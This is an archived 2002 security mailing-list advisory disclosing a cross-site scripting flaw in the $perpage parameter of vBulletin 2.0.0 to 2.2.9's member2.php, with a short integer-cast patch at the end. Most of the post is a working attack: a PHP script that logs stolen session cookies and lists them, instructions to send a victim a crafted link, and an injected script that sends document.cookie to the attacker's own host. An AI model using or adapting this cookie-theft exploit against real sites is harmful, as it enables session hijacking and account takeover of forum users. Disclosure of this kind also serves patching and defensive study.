vBulletin XSS Injection Vulnerability

From: Sp.IC (SpeedICNetat_private)
Date: Sat Nov 23 2002 - 15:13:25 PST

  • Next message: Dave Ahmad: "[Security bulletin] SSRT2266 HP Tru64 UNIX IGMP Potential (DoS) Security Vulnerability (fwd)" 

    
 ('binary' encoding is not supported, stored as-is)
.:: vBulletin XSS Injection Vulnerability

vBulletin is a powerful and widely used bulletin board system, based on 
PHP language and MySQL database. I discovered lately a Cross-Site 
Scripting issue that would allow attackers to inject maleficent codes 
into the pages and execute it on the clients browser.

+ Vulnerable Versions:

    - Jelsoft vBulletin 2.2.9 Candidate.
    - Jelsoft vBulletin 2.2.8.
    - Jelsoft vBulletin 2.2.7.
    - Jelsoft vBulletin 2.2.6.
    - Jelsoft vBulletin 2.2.5.
    - Jelsoft vBulletin 2.2.4.
    - Jelsoft vBulletin 2.2.3.
    - Jelsoft vBulletin 2.2.2.
    - Jelsoft vBulletin 2.2.1.
    - Jelsoft vBulletin 2.2.0.
    - Jelsoft vBulletin 2.0.2.
    - Jelsoft vBulletin 2.0.1.
    - Jelsoft vBulletin 2.0.0.

+ Details:

At "Start View Threads" block in member2.php, there is a variable 
[$perpage] controls the way of reciting subscribed threads, therefore an 
integer value [Which refers to the number of threads that will be 
displayed each page] should be assigned for the variable. However, we 
should realise that the value of this variable is added to a query that 
will fetch records from the database, so if a client gave a wrong value 
to $perpage, the script will output an error message [Due to script 
doesn't checks on inputs and filter it], printing the query and revealing 
its mistake.

+ Exploit:

    - Run this script on some host:

    <?PHP

      // vBulletin XSS Injection Vulnerability: Exploit
      // ---
      // Coded By  : Sp.IC (SpeedICNetat_private).
      // Descrption: Fetching vBulletin's cookies and storing it into a 
log file.

      // Variables:

      $LogFile = "Cookies.Log";

      // Functions:
  
      /*

      If ($HTTP_GET_VARS['Action'] = "Log") {

          $Header = "<!--";
          $Footer = "--->";

      }
      Else {

           $Header = "";
           $Footer = "";

      }

      Print ($Header);
  
      */
  
      Print ("<Title>vBulletin XSS Injection Vulnerability: 
Exploit</Title>");
      Print ("<Pre>");
      Print ("<Center>");
      Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
      Print ("Coded By: <B><A 
Href=\"MailTo:SpeedICNetat_private\">Sp.IC</A></B><Hr Width=\"20%\">");
  
      /*
  
      Print ($Footer);
  
      */

      Switch ($HTTP_GET_VARS['Action']) {

          Case "Log":

                 $Data = $HTTP_GET_VARS['Cookie'];

                 $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, 
StrLen (DecHex (MD5 (NULL))))));

                 $Log  = FOpen  ($LogFile, "a+");
                         FWrite ($Log, Trim ($Data) . "\n");
                         FClose ($Log);
                     
                         Print   ("<Meta HTTP-Equiv=\"Refresh\" 
Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");

          Break;
      
          Case "List":

                 If (!File_Exists ($LogFile) || !In_Array ($Records)) {

                     Print ("<Br><Br><B>There are No 
Records</B></Center></Pre>");

                     Exit  ();

                 }
                 Else {

                     Print ("</Center></Pre>");

                     $Records = Array_UniQue (File ($LogFile));
             
                     Print ("<Pre>");
             
                     Print ("<B>.:: Statics</B>\n");
                     Print ("\n");
             
                     Print ("• Logged Records : <B>" . Count (File 
($LogFile)) . "</B>\n");
                     Print ("• Listed Records : <B>" . Count 
($Records) . " </B>[Not Counting Duplicates]\n");
                     Print ("\n");
             
                     Print ("<B>.:: Options</B>\n");
                     Print ("\n");
             
                     If (Count (File ($LogFile)) > 0) {

                         $Link['Download'] = "[<A Href=\"" . 
$LogFile . "\">Download</A>]";

                     }
                     Else{

                         $Link['Download'] = "[No Records in Log]";

                     }

                     Print ("• Download Log   : " . $Link
['Download'] . "\n");
                     Print ("• Clear Records  : [<A Href=\"" . 
$SCRIPT_PATH . "?Action=Delete\">Y</A>]\n");
                     Print ("\n");
             
                     Print ("<B>.:: Records</B>\n");
                     Print ("\n");

                     While (List ($Line[0], $Line[1]) = Each ($Records)) {

                         Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);

                     }
             
                 }

                 Print ("</Pre>");
      
          Break;
      
          Case "Delete":
      
              @UnLink ($LogFile);
          
              Print   ("<Br><Br><B>Deleted 
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete 
Log</B></Center></Pre>");

              Print   ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . 
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
      
          Break;

      }
          
    ?>

    - Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]

    - Note: You can replace [Script Code] with: --
>&lt;Script&gt;location='http://[Exploit Path]?Action=Log&Cookie='+
(document.cookie);&lt;/Script&gt;
    
    - Then go to http://[Exploit Path]?Action=List

+ Solution:

    - Under [ // set defaults ] on line 304, paste this code:

        If (IsSet ($perpage) && $perpage != Is_Int($perpage)) {

            $perpage = IntVal ($perpage);

        }

+ Links:

    - http://www.vBulletin.com

    

    



    

    


This archive was generated by hypermail 2b30 
: Sat Nov 30 2002 - 12:51:30 PST